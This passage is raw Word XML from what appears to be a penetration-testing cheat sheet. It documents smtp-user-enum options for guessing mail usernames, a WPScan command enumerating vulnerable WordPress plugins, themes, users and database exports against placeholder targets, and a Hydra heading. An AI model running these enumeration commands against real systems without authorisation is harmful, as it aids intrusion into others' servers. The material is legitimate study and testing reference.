            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D2FBAC" w14:textId="77777777" w:rsidR="00E964B6" w:rsidRDefault="00E964B6" w:rsidP="00916CA0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose mode</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t</w:t>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specifiy target ip address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CFFBDE" w14:textId="77777777" w:rsidR="00E964B6" w:rsidRDefault="00E964B6" w:rsidP="00916CA0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m </w:t>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>MODE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify the SMTP command to use for username guessing</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">The Modes can be </w:t>
            </w:r>
            <w:r w:rsidRPr="00E964B6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>EXPN</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">RCPT TO </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>VRFY</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="004E6CB7">
              <w:t>t</w:t>
            </w:r>
            <w:r>
              <w:t>he default)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC51808" w14:textId="02C1B7D4" w:rsidR="004E6CB7" w:rsidRDefault="004E6CB7" w:rsidP="00916CA0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Check if a user exists on the remote system</w:t>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00102971" w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-U </w:t>
            </w:r>
            <w:r w:rsidR="00102971" w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.txt</w:t>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:tab/>
              <w:t>File of usernames to check</w:t>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00102971" w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-T </w:t>
            </w:r>
            <w:r w:rsidR="00102971" w:rsidRPr="00102971">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.txt</w:t>
            </w:r>
            <w:r w:rsidR="00102971">
              <w:tab/>
              <w:t>File of hostnames running the smtp service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00916CA0" w14:paraId="1A32DD29" w14:textId="77777777" w:rsidTr="004E6CB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="36FC089C" w14:textId="4A0A267E" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7DE309C8" w14:textId="6A4CA996" w:rsidR="00916CA0" w:rsidRPr="00EE328B" w:rsidRDefault="004E6CB7" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smtp-user-enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="183090E2" w14:textId="3D28E8CC" w:rsidR="00356624" w:rsidRDefault="004E6CB7" w:rsidP="004E6CB7">
            <w:r>
              <w:t>To install, simply enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>smtp-user-enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00916CA0" w14:paraId="116A8C6F" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="33260F8B" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="562F0696" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="651C8015" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="000A77DA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D00EB39" w14:textId="06619DDB" w:rsidR="00AC2D5A" w:rsidRDefault="00AC2D5A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="654"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2395"/>
        <w:gridCol w:w="8021"/>
      </w:tblGrid>
      <w:tr w:rsidR="009754BF" w14:paraId="13F526F8" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7DFA8F42" w14:textId="23E38FAF" w:rsidR="009754BF" w:rsidRDefault="00E0706A" w:rsidP="00AC2D5A">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="009754BF">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0F0D1213" w14:textId="48827444" w:rsidR="009754BF" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>WPScan</w:t>
            </w:r>
            <w:r w:rsidR="007D2453">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007D2453" w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="007D2453">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>wpscan</w:t>
            </w:r>
            <w:r w:rsidR="007D2453" w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
            <w:r w:rsidR="007D2453">
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1056C3B3" w14:textId="649E006F" w:rsidR="007D2453" w:rsidRPr="007D2453" w:rsidRDefault="007D2453" w:rsidP="00AC2D5A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D2453">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(For WordPress web servers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69B8CEDA" w14:textId="18038C24" w:rsidR="009754BF" w:rsidRPr="008E4F2F" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5731C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WORDPRESS SERVER USE WPSCAN, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5CAA12" w14:textId="0C247B8A" w:rsidR="009754BF" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:r>
              <w:t>Use wpscan to search for possible vulnerabilities with the wpserver located at an IP address.</w:t>
            </w:r>
            <w:r w:rsidR="008E4F2F">
              <w:t xml:space="preserve"> Usernames can also be discovered, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001A7488">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">wpscan </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7488">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--url </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7488">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X/wordpress </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7488">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--enumerate </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7488">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>vp,vt,u,dbe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--url</w:t>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>The URL to scan</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009754BF" w14:paraId="6EE89667" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E55ACF0" w14:textId="23E91E7D" w:rsidR="009754BF" w:rsidRDefault="00E0706A" w:rsidP="00AC2D5A">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="009754BF">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47D857F7" w14:textId="77777777" w:rsidR="009754BF" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8021" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51B38455" w14:textId="75E6C32D" w:rsidR="009754BF" w:rsidRPr="00EC64F5" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--enumerate </w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:t>switch can be used along with the following options…</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>vp</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>vulnerable plugins</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC645A">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>vt</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>vulnerable themes</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ap</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>all plugins</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>q</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC645A">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>at</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>all themes</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>User IDs range, 1-10 is default</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC64F5" w:rsidRPr="00EC64F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>dbe</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:tab/>
              <w:t>Db exports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009754BF" w14:paraId="3ABDA264" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="21D54805" w14:textId="50024FCA" w:rsidR="009754BF" w:rsidRDefault="00E0706A" w:rsidP="00AC2D5A">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="009754BF">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0E38AE7A" w14:textId="6A05AC1E" w:rsidR="009754BF" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8021" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25BC0FFA" w14:textId="4E5C59B6" w:rsidR="009754BF" w:rsidRDefault="009754BF" w:rsidP="00AC2D5A">
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--detection-mode </w:t>
            </w:r>
            <w:r>
              <w:t>switch can be used along with the</w:t>
            </w:r>
            <w:r w:rsidR="00EC64F5">
              <w:t xml:space="preserve"> following</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> options…</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>mixed</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>passive</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009754BF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>aggressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC2D5A" w14:paraId="012CB635" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7FA09E5E" w14:textId="77777777" w:rsidR="00AC2D5A" w:rsidRDefault="00AC2D5A" w:rsidP="00AC2D5A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4FE88292" w14:textId="77777777" w:rsidR="00AC2D5A" w:rsidRDefault="00AC2D5A" w:rsidP="00AC2D5A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8021" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25E5EFC9" w14:textId="77777777" w:rsidR="00AC2D5A" w:rsidRDefault="00AC2D5A" w:rsidP="00AC2D5A"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1122469D" w14:textId="567A4CFB" w:rsidR="00AC2D5A" w:rsidRDefault="00D5731C" w:rsidP="00AC2D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="006842C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053ED752" w14:textId="024CE787" w:rsidR="001D1C35" w:rsidRDefault="001D1C35">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F668C1F" w14:textId="2467034B" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="001D1C35">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8003BA" w14:textId="77777777" w:rsidR="001D1C35" w:rsidRPr="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="001D1C35"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="654"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D1C35" w14:paraId="3AB4E051" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
